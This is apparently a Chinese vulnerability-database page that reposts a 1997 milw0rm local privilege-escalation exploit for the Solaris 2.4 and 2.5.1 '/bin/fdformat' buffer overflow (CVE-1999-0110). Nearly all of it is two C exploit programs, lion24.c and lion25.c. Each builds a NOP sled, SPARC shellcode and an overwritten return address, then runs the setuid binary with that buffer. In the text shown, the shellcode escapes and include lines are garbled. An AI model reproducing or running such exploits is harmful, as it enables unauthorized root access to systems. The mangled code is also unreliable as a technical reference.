2021年4月8日18:02:07Solaris 2.4 - '/bin/fdformat' Local Buffer Overflow已关闭评论32 views字数 2796阅读9分19秒阅读模式
Solaris 2.4 - '/bin/fdformat' Local Buffer Overflow
| 漏洞ID | 1105287 | 漏洞类型 | |
| 发布时间 | 1997-03-23 | 更新时间 | 1997-03-23 |
CVE编号
|
CVE-1999-0110 |
CNNVD-ID
|
N/A |
| 漏洞平台 | Solaris | CVSS评分 | N/A |
|漏洞详情
This vulnerability has been rejected by the source.
|漏洞EXP
--------------------------- lion24.c ---------------------------------
/*
Solaris 2.4
*/
#include
#include
#include
#include
#define BUF_LENGTH 264
#define EXTRA 36
#define STACK_OFFSET -56
#define SPARC_NOP 0xa61cc013
u_char sparc_shellcode[] =
"x2dx0bxd8x9axacx15xa1x6ex2fx0bxdaxdcxaex15xe3x68"
"x90x0bx80x0ex92x03xa0x0cx94x1ax80x0ax9cx03xa0x14"
"xecx3bxbfxecxc0x23xbfxf4xdcx23xbfxf8xc0x23xbfxfc"
"x82x10x20x3bx91xd0x20x08x90x1bxc0x0fx82x10x20x01"
"x91xd0x20x08"
;
u_long get_sp(void)
{
__asm__("mov %sp,%i0 n");
}
void main(int argc, char *argv[])
{
char buf[BUF_LENGTH + EXTRA + 8];
long targ_addr;
u_long *long_p;
u_char *char_p;
int i, code_length = strlen(sparc_shellcode),dso=0;
if(argc > 1) dso=atoi(argv[1]);
long_p =(u_long *) buf ;
targ_addr = get_sp() - STACK_OFFSET - dso;
for (i = 0; i < (BUF_LENGTH - code_length) / sizeof(u_long); i++)
*long_p++ = SPARC_NOP;
char_p = (u_char *) long_p;
for (i = 0; i < code_length; i++)
*char_p++ = sparc_shellcode[i];
long_p = (u_long *) char_p;
for (i = 0; i < EXTRA / sizeof(u_long); i++)
*long_p++ =targ_addr;
printf("Jumping to address 0x%lx B[%d] E[%d] SO[%d]n",
targ_addr,BUF_LENGTH,EXTRA,STACK_OFFSET);
execl("/bin/fdformat", "fdformat ", &buf[0],(char *) 0);
perror("execl failed");
}
------------------------------ end of lion24.c --------------------------
-------------------------------- lion25.c ------------------------------
/*
Solaris 2.5.1 - this exploited was compiled on Solaris2.4 and tested on
2.5.1
*/
#include
#include
#include
#include
#define BUF_LENGTH 364
#define EXTRA 400
#define STACK_OFFSET 704
#define SPARC_NOP 0xa61cc013
u_char sparc_shellcode[] =
"x2dx0bxd8x9axacx15xa1x6ex2fx0bxdaxdcxaex15xe3x68"
"x90x0bx80x0ex92x03xa0x0cx94x1ax80x0ax9cx03xa0x14"
"xecx3bxbfxecxc0x23xbfxf4xdcx23xbfxf8xc0x23xbfxfc"
"x82x10x20x3bx91xd0x20x08x90x1bxc0x0fx82x10x20x01"
"x91xd0x20x08"
;
u_long get_sp(void)
{
__asm__("mov %sp,%i0 n");
}
void main(int argc, char *argv[])
{
char buf[BUF_LENGTH + EXTRA + 8];
long targ_addr;
u_long *long_p;
u_char *char_p;
int i, code_length = strlen(sparc_shellcode),dso=0;
if(argc > 1) dso=atoi(argv[1]);
long_p =(u_long *) buf ;
targ_addr = get_sp() - STACK_OFFSET - dso;
for (i = 0; i < (BUF_LENGTH - code_length) / sizeof(u_long); i++)
*long_p++ = SPARC_NOP;
char_p = (u_char *) long_p;
for (i = 0; i < code_length; i++)
*char_p++ = sparc_shellcode[i];
long_p = (u_long *) char_p;
for (i = 0; i < EXTRA / sizeof(u_long); i++)
*long_p++ =targ_addr;
printf("Jumping to address 0x%lx B[%d] E[%d] SO[%d]n",
targ_addr,BUF_LENGTH,EXTRA,STACK_OFFSET);
execl("/bin/fdformat", "fdformat", & buf[1],(char *) 0);
perror("execl failed");
}
--------------------------- end of lion25.c -------------------------------
// milw0rm.com [1997-03-23]rwhod缓冲区溢出漏洞 漏洞ID 1207643 漏洞类型 缓冲区溢出 发布时间 1996-08-21 更新时间 1996-08-21 CVE编号 CVE-1999-0085 CNNVD-ID CNNVD-199608-006 漏洞平台 N/A CVSS评分…
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论